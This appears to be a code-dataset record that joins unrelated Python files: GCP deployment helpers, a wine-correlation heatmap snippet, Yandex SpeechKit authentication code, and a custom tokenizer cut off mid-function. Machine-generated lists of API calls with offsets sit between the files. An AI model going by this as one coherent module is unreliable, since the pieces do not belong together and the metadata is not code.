def get_log_sink_service_account(log_sink_name, project_id):
  """Gets the service account name for the given log sink."""
  writer_identity = runner.run_gcloud_command(
      ['logging', 'sinks', 'describe', log_sink_name,
       '--format', 'value(writerIdentity)'], project_id).strip()
  # The identity is returned with a 'serviceAccount:' prefix; drop it.
  return writer_identity.split(':')[1]
def get_gce_instance_info(project_id):
  """Gets a list of GCE instance info for each instance."""
  listing = runner.run_gcloud_command(
      ['compute', 'instances', 'list', '--format', 'value(name,id)'],
      project_id=project_id)
  if not listing:
    return []
  # Each output line is "<name> <id>".
  return [{'name': name, 'id': instance_id}
          for name, instance_id in (row.split() for row in listing.split('\n'))]
def resolve_env_vars(config):
  """Recursively resolves (in place) environment variables in config strings.

  Args:
    config: dictionary or list from a parsed YAML file.
  """
  if isinstance(config, dict):
    entries = list(config.items())
  elif isinstance(config, list):
    entries = list(enumerate(config))
  else:
    # Scalars other than strings are left untouched.
    return
  for key, value in entries:
    if isinstance(value, str):
      # $VAR / ${VAR} references are substituted from the environment;
      # unknown variables are left as-is (safe_substitute).
      config[key] = string.Template(value).safe_substitute(os.environ)
    else:
      # Recurse into nested lists and dictionaries.
      resolve_env_vars(value)
def merge_dicts(dst, src):
  """Merge src into dst.

  Lists are concatenated, dicts are merged recursively; any other shared
  key is a conflict.

  Args:
    dst: Dictionary for all configs.
    src: Dictionary to be merged.

  Raises:
    TypeError: If two dictionaries have the same key and different value types.
  """
  for key, incoming in src.items():
    if key not in dst:
      dst[key] = incoming
      continue
    existing = dst[key]
    if isinstance(incoming, list) and isinstance(existing, list):
      existing.extend(incoming)
    elif isinstance(incoming, dict) and isinstance(existing, dict):
      merge_dicts(existing, incoming)
    else:
      raise TypeError('Conflict key %s in config files.' % key)
def get_import_files(overall, overall_path):
  """Get all imported file normalized paths.

  Combines the explicitly listed import_files with every file matched by
  the imports glob patterns.

  Args:
    overall: dictionary or list from a parsed YAML file.
    overall_path: The path of the overall YAML file.

  Returns:
    A list holding all the imported file normalized paths, sorted.
  """
  base_dir = os.path.dirname(overall_path)
  declared = {
      os.path.normpath(os.path.join(base_dir, rel))
      for rel in overall.get(IMPORT_FILES_TAG, [])
  }
  return sorted(declared | set(expand_imports(overall, overall_path)))
def expand_imports(overall, overall_path):
  """Find all to be imported files to extend import_files.

  Expands each glob pattern under the imports tag relative to the overall
  file's directory, excluding the overall file itself.

  Args:
    overall: dictionary or list from a parsed YAML file.
    overall_path: The path of the overall YAML file.

  Returns:
    A set holding all the imported file paths.
  """
  base_dir = os.path.dirname(overall_path)
  matched = set()
  for pattern in overall.get(IMPORT_PATTERN_TAG, []):
    full_pattern = os.path.normpath(os.path.join(base_dir, pattern))
    matched.update(
        path for path in glob.glob(full_pattern) if path != overall_path)
  return matched
def load_config(overall_path):
  """Reads and parses a YAML file, merging in all of its imports.

  Args:
    overall_path (string): The path to the YAML file.

  Returns:
    A dict holding the parsed contents of the YAML file, or None if the file
    could not be read or parsed.
  """
  overall = read_yaml_file(overall_path)
  if not overall:
    return None
  # Fold every imported file into the top-level config.
  for imported_path in get_import_files(overall, overall_path):
    merge_dicts(overall, read_yaml_file(imported_path))
  # Substitute $VAR references after all merging is done.
  resolve_env_vars(overall)
  return overall
def call_go_binary(parameter_list):
  """Call Golang binary."""
  # Skipped entirely in dry-run mode; otherwise only invoked when the
  # new-style-resources flag is enabled.
  if not FLAGS.dry_run and FLAGS.enable_new_style_resources:
    subprocess.check_call(parameter_list)
class InvalidConfigError(Exception):
  """The exception when the config file is invalid."""
  pass
| [
"json.loads",
"string.Template",
"os.path.isabs",
"subprocess.check_call",
"os.path.join",
"os.getcwd",
"os.path.dirname",
"jsonschema.validate",
"glob.glob",
"tempfile.NamedTemporaryFile",
"deploy.utils.runner.run_gcloud_command",
"os.path.expanduser"
] | [((476, 501), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (491, 501), False, 'import os\n'), ((3158, 3193), 'jsonschema.validate', 'jsonschema.validate', (['config', 'schema'], {}), '(config, schema)\n', (3177, 3193), False, 'import jsonschema\n'), ((3733, 3776), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".yaml"""'}), "(suffix='.yaml')\n", (3760, 3776), False, 'import tempfile\n'), ((4362, 4422), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (['gcloud_cmd'], {'project_id': 'project_id'}), '(gcloud_cmd, project_id=project_id)\n', (4387, 4422), False, 'from deploy.utils import runner\n'), ((4494, 4614), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['deployment-manager', 'deployments', 'describe', deployment_name]"], {'project_id': 'project_id'}), "(['deployment-manager', 'deployments', 'describe',\n deployment_name], project_id=project_id)\n", (4519, 4614), False, 'from deploy.utils import runner\n'), ((4891, 5010), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['deployment-manager', 'deployments', 'list', '--format', 'json']"], {'project_id': 'project_id'}), "(['deployment-manager', 'deployments', 'list',\n '--format', 'json'], project_id=project_id)\n", (4916, 5010), False, 'from deploy.utils import runner\n'), ((5035, 5050), 'json.loads', 'json.loads', (['out'], {}), '(out)\n', (5045, 5050), False, 'import json\n'), ((5607, 5650), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".yaml"""'}), "(suffix='.yaml')\n", (5634, 5650), False, 'import tempfile\n'), ((6900, 6943), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".yaml"""'}), "(suffix='.yaml')\n", (6927, 6943), False, 'import tempfile\n'), ((8208, 8347), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['alpha', 'monitoring', 'policies', 'create', 
'--policy-from-file',\n config_file.name]"], {'project_id': 'project_id'}), "(['alpha', 'monitoring', 'policies', 'create',\n '--policy-from-file', config_file.name], project_id=project_id)\n", (8233, 8347), False, 'from deploy.utils import runner\n'), ((9570, 9686), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['compute', 'instances', 'list', '--format', 'value(name,id)']"], {'project_id': 'project_id'}), "(['compute', 'instances', 'list', '--format',\n 'value(name,id)'], project_id=project_id)\n", (9595, 9686), False, 'from deploy.utils import runner\n'), ((878, 902), 'os.path.expanduser', 'os.path.expanduser', (['path'], {}), '(path)\n', (896, 902), False, 'import os\n'), ((937, 956), 'os.path.isabs', 'os.path.isabs', (['path'], {}), '(path)\n', (950, 956), False, 'import os\n'), ((1224, 1235), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1233, 1235), False, 'import os\n'), ((1262, 1285), 'os.path.join', 'os.path.join', (['cwd', 'path'], {}), '(cwd, path)\n', (1274, 1285), False, 'import os\n'), ((12262, 12289), 'glob.glob', 'glob.glob', (['absolute_pattern'], {}), '(absolute_pattern)\n', (12271, 12289), False, 'import glob\n'), ((13062, 13099), 'subprocess.check_call', 'subprocess.check_call', (['parameter_list'], {}), '(parameter_list)\n', (13083, 13099), False, 'import subprocess\n'), ((5909, 6088), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['alpha', 'monitoring', 'channels', 'create', '--channel-content-from-file',\n config_file.name, '--format', 'value(name)']"], {'project_id': 'project_id'}), "(['alpha', 'monitoring', 'channels', 'create',\n '--channel-content-from-file', config_file.name, '--format',\n 'value(name)'], project_id=project_id)\n", (5934, 6088), False, 'from deploy.utils import runner\n'), ((8455, 8567), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['config', 'list', 'account', '--format', 'value(core.account)']"], {'project_id': 'None'}), "(['config', 
'list', 'account', '--format',\n 'value(core.account)'], project_id=None)\n", (8480, 8567), False, 'from deploy.utils import runner\n'), ((8686, 8806), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['projects', 'describe', project_id, '--format', 'value(projectNumber)']"], {'project_id': 'None'}), "(['projects', 'describe', project_id, '--format',\n 'value(projectNumber)'], project_id=None)\n", (8711, 8806), False, 'from deploy.utils import runner\n'), ((9199, 9326), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['logging', 'sinks', 'describe', log_sink_name, '--format',\n 'value(writerIdentity)']", 'project_id'], {}), "(['logging', 'sinks', 'describe', log_sink_name,\n '--format', 'value(writerIdentity)'], project_id)\n", (9224, 9326), False, 'from deploy.utils import runner\n'), ((12205, 12234), 'os.path.dirname', 'os.path.dirname', (['overall_path'], {}), '(overall_path)\n', (12220, 12234), False, 'import os\n'), ((10355, 10373), 'string.Template', 'string.Template', (['v'], {}), '(v)\n', (10370, 10373), False, 'import string\n'), ((11573, 11602), 'os.path.dirname', 'os.path.dirname', (['overall_path'], {}), '(overall_path)\n', (11588, 11602), False, 'import os\n')] |
import pandas as pd  # FIX: `pd` was used below without being imported
import seaborn as sns
import matplotlib.pyplot as plt

# Load the wine dataset and drop the non-numeric 'type' label column so that
# .corr() operates on numeric columns only.
wine = pd.read_csv('https://raw.githubusercontent.com/hadley/rminds/master/1-data/wine.csv').drop('type', axis=1)

# Correlation matrix, rendered twice: once as a seaborn heatmap, once with
# matplotlib's matshow plus an explicit colorbar.
sns.heatmap(wine.corr(), cmap='viridis'); plt.show()
plt.matshow(wine.corr(), cmap='viridis')
plt.colorbar()
plt.show()
"matplotlib.pyplot.colorbar",
"matplotlib.pyplot.show"
] | [((243, 253), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (251, 253), True, 'import matplotlib.pyplot as plt\n'), ((298, 312), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (310, 312), True, 'import matplotlib.pyplot as plt\n'), ((313, 323), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (321, 323), True, 'import matplotlib.pyplot as plt\n')] |
import functools
import time
import jwt
import requests
from speechkit.exceptions import RequestError
def generate_jwt(service_account_id, key_id, private_key, exp_time=360):
    """
    Build a signed JWT suitable for the Yandex Cloud IAM token exchange.

    :param string service_account_id: The ID of the service account whose key the JWT is signed with.
    :param string key_id: The ID of the Key resource belonging to the service account.
    :param bytes private_key: Private key given from Yandex Cloud console in bytes
    :param integer exp_time: Optional. The token expiration time delta in seconds. The expiration
        time must not exceed the issue time by more than one hour, meaning exp_time ≤ 3600. Default 360
    :return: JWT token
    :rtype: string
    """
    # Validate the two string identifiers first.
    if not (isinstance(service_account_id, str) and isinstance(key_id, str)):
        raise ValueError("service_account_id, key_id, must be strings.")
    if len(service_account_id) == 0 or len(key_id) == 0:
        raise ValueError("service_account_id, key_id, can't be empty.")
    if not isinstance(private_key, bytes):
        raise ValueError("private_key must be bytes string, but got {}".format(type(private_key)))
    if not isinstance(exp_time, int):
        raise ValueError("exp_time must be int, but got {}".format(type(exp_time)))
    if exp_time > 3600:
        raise ValueError("exp_time ≤ 3600, but got {}".format(exp_time))
    issued_at = int(time.time())
    claims = {
        'aud': 'https://iam.api.cloud.yandex.net/iam/v1/tokens',
        'iss': service_account_id,
        'iat': issued_at,
        'exp': issued_at + exp_time,
    }
    # PS256 with the key id in the header, as required by the IAM endpoint.
    return jwt.encode(claims, private_key, algorithm='PS256', headers={'kid': key_id})
def get_iam_token(yandex_passport_oauth_token=None, jwt_token=None):
    """
    Exchange exactly one credential (OAuth token OR JWT) for an IAM token.

    `Getting IAM for Yandex account <https://cloud.yandex.com/en/docs/iam/operations/iam-token/create>`_

    :param string yandex_passport_oauth_token: OAuth token from Yandex OAuth
    :param string jwt_token: Json Web Token, can be generated by :py:meth:`speechkit.generate_jwt`
    :return: IAM token
    :rtype: string
    """
    # Deliberately an exact type() check (not isinstance) to match historic behaviour.
    if type(yandex_passport_oauth_token) not in (str, type(None)):
        raise TypeError("__init__() yandex_passport_oauth_token: got {} but expected type is str or None".format(
            type(yandex_passport_oauth_token).__name__))
    if type(jwt_token) not in (str, type(None)):
        raise TypeError("__init__() jwt_token: got {} but expected type is str or None".format(
            type(jwt_token).__name__))
    # Exactly one of the two credentials must be truthy.
    if bool(yandex_passport_oauth_token) == bool(jwt_token):
        raise ValueError("Includes only one of the fields `yandex_passport_oauth_token`, `jwt_token`")
    if yandex_passport_oauth_token:
        payload = {'yandexPassportOauthToken': str(yandex_passport_oauth_token)}
    else:
        payload = {'jwt': str(jwt_token)}
    answer = requests.post("https://iam.api.cloud.yandex.net/iam/v1/tokens", json=payload)
    if not answer.ok:
        raise RequestError(answer.json())
    return answer.json().get('iamToken')
def get_api_key(yandex_passport_oauth_token=None, service_account_id=None,
                description='Default Api-Key created by `speechkit` python SDK'):
    """
    Create an Api-Key for the specified service account.

    :param string yandex_passport_oauth_token: OAuth token from Yandex OAuth
    :param string service_account_id: The ID of the service account whose key the Api-Key is signed with.
    :param string description: Description for api-key. Optional.
    :return: Api-Key
    :rtype: string
    """
    if not (yandex_passport_oauth_token and service_account_id):
        raise ValueError("`yandex_passport_oauth_token` and `service_account_id` required.")
    # First trade the OAuth token for a short-lived IAM token, then create the key.
    iam = get_iam_token(yandex_passport_oauth_token=yandex_passport_oauth_token)
    answer = requests.post(
        'https://iam.api.cloud.yandex.net/iam/v1/apiKeys',
        headers={'Authorization': 'Bearer {}'.format(iam)},
        json={'serviceAccountId': service_account_id, 'description': description},
    )
    if not answer.ok:
        raise RequestError(answer.json())
    return answer.json().get('secret')
class Session:
    """Stores the credential and folder scope used to authenticate Yandex API calls."""

    # Marker for IAM-token based auth.
    IAM_TOKEN = 'iam_token'
    # Marker for Api-Key based auth.
    API_KEY = 'api_key'

    def __init__(self, auth_type, credential, folder_id):
        """
        Store credentials for the given auth method.

        :param string auth_type: Type of auth, :py:meth:`Session.IAM_TOKEN` or :py:meth:`Session.API_KEY`
        :param string credential: Auth key (IAM token or api key)
        :param string | None folder_id: Id of the folder that you have access to. Don't specify this
            field if you make a request on behalf of a service account.
        """
        if auth_type not in (self.IAM_TOKEN, self.API_KEY):
            raise ValueError(
                "auth_type must be `Session.IAM_TOKEN` or `Session.API_KEY`, but given {}".format(auth_type)
            )
        if not isinstance(credential, str):
            raise ValueError("_credential must be string, but got {}".format(type(credential)))
        self._auth_method = auth_type
        self._credential = credential
        self.folder_id = folder_id

    @staticmethod
    def _require_str(value, type_msg, empty_msg):
        """Raise ValueError (with the given messages) unless *value* is a non-empty str."""
        if not isinstance(value, str):
            raise ValueError(type_msg.format(type(value)))
        if len(value) == 0:
            raise ValueError(empty_msg)

    @classmethod
    def from_api_key(cls, api_key, folder_id=None):
        """
        Create a session from an Api-Key.

        :param string api_key: Yandex Cloud Api-Key
        :param string | None folder_id: Id of the folder that you have access to.
        :return: Session instance
        :rtype: Session
        """
        cls._require_str(api_key, "Api-Key must be string, but got {}", "Api-Key can not be empty.")
        if folder_id:
            cls._require_str(folder_id, "folder_id must be string, but got {}",
                             "folder_id must not be empty.")
        return cls(cls.API_KEY, api_key, folder_id=folder_id)

    @classmethod
    def from_yandex_passport_oauth_token(cls, yandex_passport_oauth_token, folder_id):
        """
        Create a session from a Yandex.OAuth token (exchanged for an IAM token).

        :param string yandex_passport_oauth_token: OAuth token from Yandex.OAuth
        :param string folder_id: Id of the folder that you have access to.
        :return: Session instance
        :rtype: Session
        """
        cls._require_str(
            yandex_passport_oauth_token,
            "yandex_passport_oauth_token must be string, but got {}",
            "yandex_passport_oauth_token can not be empty.",
        )
        cls._require_str(folder_id, "folder_id must be string, but got {}",
                         "folder_id must not be empty.")
        iam_token = get_iam_token(yandex_passport_oauth_token=yandex_passport_oauth_token)
        return cls(cls.IAM_TOKEN, iam_token, folder_id=folder_id)

    @classmethod
    def from_jwt(cls, jwt_token, folder_id=None):
        """
        Create a session from a JWT (exchanged for an IAM token).

        :param string jwt_token: JWT
        :param string | None folder_id: Id of the folder that you have access to.
        :return: Session instance
        :rtype: Session
        """
        cls._require_str(jwt_token, "jwt_token must be string, but got {}", "jwt_token can not be empty.")
        if folder_id:
            cls._require_str(folder_id, "folder_id must be string, but got {}",
                             "folder_id must not be empty.")
        iam_token = get_iam_token(jwt_token=jwt_token)
        return cls(cls.IAM_TOKEN, iam_token, folder_id=folder_id)

    @functools.cached_property
    def header(self):
        """
        Authentication header.

        :return: Dict in format `{'Authorization': 'Bearer or Api-Key {iam or api_key}'}`
        :rtype: dict
        """
        if self._auth_method == self.IAM_TOKEN:
            value = 'Bearer {iam}'.format(iam=self._credential)
        elif self._auth_method == self.API_KEY:
            value = 'Api-Key {api_key}'.format(api_key=self._credential)
        else:
            return None
        return {'Authorization': value}

    @functools.cached_property
    def streaming_recognition_header(self):
        """
        Authentication header for streaming recognition.

        :return: Tuple in format `('authorization', 'Bearer or Api-Key {iam or api_key}')`
        :rtype: tuple
        """
        if self._auth_method == self.IAM_TOKEN:
            value = 'Bearer {iam}'.format(iam=self._credential)
        elif self._auth_method == self.API_KEY:
            value = 'Api-Key {api_key}'.format(api_key=self._credential)
        else:
            return None
        return ('authorization', value)

    @functools.cached_property
    def auth_method(self):
        return self._auth_method
| [
"requests.post",
"time.time",
"jwt.encode"
] | [((1603, 1679), 'jwt.encode', 'jwt.encode', (['payload', 'private_key'], {'algorithm': '"""PS256"""', 'headers': "{'kid': key_id}"}), "(payload, private_key, algorithm='PS256', headers={'kid': key_id})\n", (1613, 1679), False, 'import jwt\n'), ((3079, 3108), 'requests.post', 'requests.post', (['url'], {'json': 'data'}), '(url, json=data)\n', (3092, 3108), False, 'import requests\n'), ((4200, 4246), 'requests.post', 'requests.post', (['url'], {'headers': 'headers', 'json': 'data'}), '(url, headers=headers, json=data)\n', (4213, 4246), False, 'import requests\n'), ((1407, 1418), 'time.time', 'time.time', ([], {}), '()\n', (1416, 1418), False, 'import time\n')] |
import io
import re
import sys
import token
import tokenize
from token import tok_name
from tokenize import TokenInfo
from typing import Iterator, List
# Character tables / regexes shared by the hand-rolled tokenizers below.
numchars = "0123456789"  # digit characters (not referenced by the visible generators)
reNamelike = re.compile(r"[A-Za-z_]")  # single identifier-start char (not referenced by the visible generators)
reWhitespace = re.compile("[ \t\n]+")  # a run of spaces, tabs and newlines
reName = re.compile(r"[A-Za-z_]\w*")  # a full identifier
reStringStart = re.compile(r'"""|"|\'\'\'|\'')  # opening quote; triple quotes tried before single
def read_number(data):
    """Return the leading NUMBER token of *data*, or False if none.

    Delegates to the stdlib tokenizer ("cheat for now"). The final character of
    *data* is dropped before tokenizing because callers always pass a slice
    ending in a newline (which may be an escaped newline).

    FIX: removed a leftover debug statement that printed every input
    containing the character "3" to stdout.
    """
    stream = io.StringIO(data[:-1])
    first = next(tokenize.generate_tokens(stream.readline))
    if first.type == token.NUMBER:
        return first.string
    return False
def character_generator(file_interface, encoding="utf-8", verbose=False):
    """Yield TokenInfo objects by scanning *file_interface* character by character.

    Reads the whole stream up front (decoding with *encoding* when the data is
    bytes), then walks a cursor through it. Emitted token kinds: NEWLINE, OP
    (single space for whitespace runs, or any other single char), STRING, NAME
    and NUMBER (single digits only — see note below). A final NEWLINE and
    ENDMARKER are always appended.

    :param file_interface: object with a ``.read()`` returning str or bytes
    :param encoding: codec used when ``.read()`` returns bytes
    :param verbose: when True, print a trace of each processed line
    """
    raw_data = file_interface.read()
    try:
        data = raw_data.decode(encoding)
    except AttributeError:
        # .read() already returned str — no decoding needed.
        data = raw_data
    pos, maxlen = 0, len(data)
    line_start, line_end = 0, 0
    line_no = 0
    while pos < maxlen:
        # if pos > 3050:
        #     return
        _previous_pos = pos  # used to assert forward progress each iteration
        if line_end <= pos:
            # The cursor crossed into a new line: recompute line bounds.
            line_no += 1
            # work out the line end for line-slicing
            line_start = line_end
            line_end = data.find("\n", pos) + 1
            if line_end == 0:
                # No trailing newline: the "line" extends to end of data.
                line_end = maxlen
        line = data[line_start:line_end]
        line_remaining = data[pos:line_end]
        # print(line)
        if verbose:
            # Show the current line with a cursor marker at `pos`.
            print(
                "Processing line: \033[37m"
                + repr(
                    data[line_start:pos] + "_e_[30;1m|_e_[0m" + data[pos:line_end]
                ).replace("_e_", "\033")
            )
        if data[pos] == "\\" and not (pos + 1) == maxlen and data[pos + 1] == "\n":
            # Handle swallowing escaped newlines (no token emitted).
            if verbose:
                print("Escaped newline")
            pos += 2
            line_no += 1
        elif match := reWhitespace.match(data, pos=pos):
            # A whitespace run collapses to one token: NEWLINE if it contains
            # any newline (note: string is always a single "\n"), else one OP " ".
            newlines = match.group().count("\n")
            if "\n" in match.group():
                yield TokenInfo(
                    type=token.NEWLINE,
                    string="\n",
                    start=(line_no, pos),
                    end=(line_no + newlines, match.end()),
                    line=line,
                )
            else:
                yield TokenInfo(
                    type=token.OP,
                    string=" ",
                    start=(line_no, pos),
                    end=(line_no, match.end()),
                    line=line,
                )
            pos = match.end()
            line_no += newlines
        # elif data[pos] == "\t":
        #     if verbose:
        #         print(f"{pos}: Tab (sent space)")
        #     yield TokenInfo(
        #         type=token.OP,
        #         string=" ",
        #         start=(line_no, pos),
        #         end=(line_no, pos),
        #         line=line,
        #     )
        #     pos += 1
        elif data[pos] == "\n":
            if verbose:
                print(f"{pos}: NEWLINE")
            pos += 1
            yield TokenInfo(
                type=token.NEWLINE,
                string="\n",
                start=(line_no, pos - 1),
                end=(line_no, pos),
                line=line,
            )
        elif (string := reStringStart.match(data, pos=pos)) and (
            pos == 0 or data[pos - 1] in " \n\t{}="
        ):
            # String literal. Only treated as a string when preceded by one of
            # a few separator characters (or at start of data).
            quote_type = string.group()
            end_pattern = r"(?<!\\)" + quote_type  # closing quote, not backslash-escaped
            re_endquote = re.compile(end_pattern, re.M | re.S)
            end_match = re_endquote.search(data, pos=pos + len(quote_type))
            assert end_match, "Unterminated string"
            contents = data[
                string.start() + len(quote_type) : end_match.end() - len(quote_type)
            ]
            start_l = line_no
            line_no += contents.count("\n")  # strings may span lines
            # Found the start of some string
            # data.find(quote_type, pos=pos+len(string))
            if verbose:
                print(f"STRING: {contents!r}")
            full_str = quote_type + contents + quote_type
            yield TokenInfo(
                type=token.STRING,
                string=full_str,
                start=(start_l, pos),
                end=(line_no + 1, pos + len(full_str)),
                line="",
            )
            pos = end_match.end()
        elif name := reName.match(data, pos=pos):
            if verbose:
                print(f"{pos}: NAME {name.group()}")
            yield TokenInfo(
                type=token.NAME,
                string=name.group(),
                start=(line_no, name.start()),
                end=(line_no, name.end()),
                line=line,
            )
            pos += len(name.group())
        elif data[pos] in "0123456789":
            # NOTE(review): only a single digit is emitted per NUMBER token;
            # multi-digit numbers come out as a sequence of NUMBER tokens.
            yield TokenInfo(
                type=token.NUMBER,
                string=data[pos],
                start=(line_no, pos),
                end=(line_no, pos),
                line=line,
            )
            pos += 1
        else:
            # Anything unrecognized is forwarded as a one-character OP token.
            if verbose:
                print(f"OP: {data[pos]}")
            yield TokenInfo(
                type=token.OP,
                string=data[pos],
                start=(line_no, pos),
                end=(line_no, pos + 1),
                line=line,
            )
            # print("Something else?")
            pos += 1
        assert pos != _previous_pos, "Didn't advance position"
    # Terminate the stream the way the stdlib tokenizer does.
    yield TokenInfo(
        type=token.NEWLINE,
        string="\n",
        start=(line_no, pos),
        end=(line_no, pos),
        line="",
    )
    yield TokenInfo(
        type=token.ENDMARKER,
        string="",
        start=(line_no, pos + 1),
        end=(line_no, pos + 1),
        line="",
    )
    return None
def simple_generator(file_interface, encoding="utf-8", verbose=True):
    """Line-oriented tokenizer: yield TokenInfo objects from *file_interface*.

    Unlike :func:`character_generator`, this variant skips whitespace without
    emitting tokens, strips ``#`` comments, and uses :func:`read_number` for
    multi-character numbers. NOTE: *verbose* defaults to True here.

    NOTE(review): the final ``return TokenInfo(...)`` passes plain ints for
    start/end (not (row, col) tuples) and is only observable as the
    StopIteration value of the generator.
    """
    #
    # needcont: Currently processing a continuing string
    # contstr: The string currently being built
    # endprog: The match condition for ending a continuing string
    raw_data = file_interface.read()
    try:
        data = raw_data.decode(encoding)
    except AttributeError:
        # .read() already returned str — no decoding needed.
        data = raw_data
    # last_line = b""
    # line = b""
    # line_no = 0
    # while True:
    #     try:
    #         last_line = line
    #         line = file_interface()
    #     except StopIteration:
    #         line = b""
    #     if encoding is not None:
    #         line = line.decode(encoding)
    #     line_no += 1
    #     pos, max = 0, len(line)
    pos, maxlen = 0, len(data)
    line_start, line_end = 0, 0
    line_no = 0
    while pos < maxlen:
        # if pos > 3050:
        #     return
        _previous_pos = pos  # used to assert forward progress each iteration
        if line_end <= pos:
            # The cursor crossed into a new line: recompute line bounds.
            line_no += 1
            # work out the line end for line-slicing
            line_start = line_end
            line_end = data.find("\n", pos) + 1
            if line_end == 0:
                # No trailing newline: the "line" extends to end of data.
                line_end = maxlen
        line = data[line_start:line_end]
        line_remaining = data[pos:line_end]
        if verbose:
            # Show the current line with a cursor marker at `pos`.
            print(
                "Processing line: \033[37m"
                + repr(
                    data[line_start:pos] + "_e_[30;1m|_e_[0m" + data[pos:line_end]
                ).replace("_e_", "\033")
            )
        if match := reWhitespace.match(line_remaining):
            # Skip whitespace
            pos += match.end()
        elif data[pos] == "\\" and not (pos + 1) == maxlen and data[pos + 1] == "\n":
            # Handle swallowing escaped newlines
            if verbose:
                print("Escaped newline")
            pos += 2
        elif data[pos] == "\n":
            if verbose:
                print(f"NEWLINE")
            pos += 1
            yield TokenInfo(
                type=token.NEWLINE,
                string="\n",
                start=(line_no, pos - 1),
                end=(line_no, pos),
                line=line,
            )
        elif match := reName.match(line_remaining):
            if verbose:
                print(f"NAME: {match.group(0)}")
            pos += match.end()
            yield TokenInfo(
                type=token.NAME,
                string=match.group(0),
                start=(line_no, match.start()),
                end=(line_no, match.end()),
                line=line,
            )
        elif data[pos] == "#":
            # Comment: discard the rest of the line, no token emitted.
            pos = line_end
        elif number := read_number(line_remaining):
            if verbose:
                print(f"NUMBER: {number}")
            yield TokenInfo(
                type=token.NUMBER,
                string=number,
                start=(line_no, pos),
                end=(line_no, pos + len(number)),
                line=line,
            )
            pos += len(number)
        elif string := reStringStart.match(data, pos=pos):
            # String literal: scan ahead for the matching, non-escaped close quote.
            quote_type = string.group()
            end_pattern = r"(?<!\\)" + quote_type
            re_endquote = re.compile(end_pattern, re.M | re.S)
            end_match = re_endquote.search(data, pos=pos + len(quote_type))
            assert end_match, "Unterminated string"
            contents = data[
                string.start() + len(quote_type) : end_match.end() - len(quote_type)
            ]
            # Found the start of some string
            # data.find(quote_type, pos=pos+len(string))
            # NOTE(review): no STRING token is yielded here — the string is
            # only skipped (and printed when verbose).
            if verbose:
                print(f"STRING: {contents!r}")
            pos = end_match.end()
        else:
            # Anything unrecognized is forwarded as a one-character OP token.
            if verbose:
                print(f"CHAR: {data[pos]}")
            yield TokenInfo(
                type=token.OP,
                string=data[pos],
                start=(line_no, pos),
                end=(line_no, pos + 1),
                line=line,
            )
            # print("Something else?")
            pos += 1
        assert pos != _previous_pos, "Didn't advance position"
    return TokenInfo(type=token.ENDMARKER, string="", start=pos, end=pos, line="")
Mark = int  # NewType('Mark', int)

exact_token_types = token.EXACT_TOKEN_TYPES  # type: ignore


def shorttok(tok: tokenize.TokenInfo) -> str:
    """Render *tok* as a fixed-width (exactly 25 char) one-line summary."""
    detail = f"{tok.start[0]}.{tok.start[1]}: {token.tok_name[tok.type]}:{tok.string!r}"
    # %-25.25s left-pads to 25 chars and truncates anything longer.
    return "%-25.25s" % detail
class Tokenizer:
    """Caching wrapper for the tokenize module.

    This is pretty tied to Python's syntax.
    """

    _tokens: List[tokenize.TokenInfo]

    def __init__(
        self, tokengen: Iterator[tokenize.TokenInfo], *, verbose: bool = False
    ):
        self._tokengen = tokengen
        self._tokens = []
        self._index = 0
        self._verbose = verbose
        if verbose:
            self.report(False, False)

    def _fill(self) -> None:
        """Pull tokens from the generator until ``self._index`` is cached.

        Shared normalization (previously duplicated in getnext()/peek()):
        COMMENT/INDENT/DEDENT and whitespace-only ERRORTOKENs are dropped,
        and NL is rewritten as NEWLINE.
        """
        while self._index == len(self._tokens):
            tok = next(self._tokengen)
            if tok.type in (tokenize.COMMENT, tokenize.INDENT, tokenize.DEDENT):
                continue
            # Transform NL to NEWLINE
            if tok.type == token.NL:
                tok = tokenize.TokenInfo(
                    token.NEWLINE,
                    tok.string,
                    start=tok.start,
                    end=tok.end,
                    line=tok.line,
                )
            if tok.type == token.ERRORTOKEN and tok.string.isspace():
                continue
            self._tokens.append(tok)

    def getnext(self) -> tokenize.TokenInfo:
        """Return the next token and updates the index."""
        # The token is "cached" iff nothing needed to be pulled from the generator.
        cached = self._index < len(self._tokens)
        self._fill()
        tok = self._tokens[self._index]
        self._index += 1
        if self._verbose:
            self.report(cached, False)
        return tok

    def peek(self) -> tokenize.TokenInfo:
        """Return the next token *without* updating the index."""
        self._fill()
        return self._tokens[self._index]

    def diagnose(self) -> tokenize.TokenInfo:
        """Return the most recently cached token (pulling one if none yet)."""
        if not self._tokens:
            self.getnext()
        return self._tokens[-1]

    def mark(self) -> Mark:
        """Return the current position so the caller can reset() back to it."""
        return self._index

    def reset(self, index: Mark) -> None:
        """Rewind (or fast-forward within the cache) to a previous mark()."""
        if index == self._index:
            return
        assert 0 <= index <= len(self._tokens), (index, len(self._tokens))
        old_index = self._index
        self._index = index
        if self._verbose:
            self.report(True, index < old_index)

    def report(self, cached: bool, back: bool) -> None:
        """Print a one-line trace of the current position (verbose mode only)."""
        if back:
            fill = "-" * self._index + "-"
        elif cached:
            fill = "-" * self._index + ">"
        else:
            fill = "-" * self._index + "*"
        if self._index == 0:
            print(f"{fill} (Bof)")
        else:
            tok = self._tokens[self._index - 1]
            print(f"{fill} {shorttok(tok)}")
def main():
    """CLI entry point: tokenize a file (or stdin) and print each token."""
    import argparse

    # Helper error handling routines
    def perror(message):
        sys.stderr.write(message)
        sys.stderr.write("\n")

    def error(message, filename=None, location=None):
        if location:
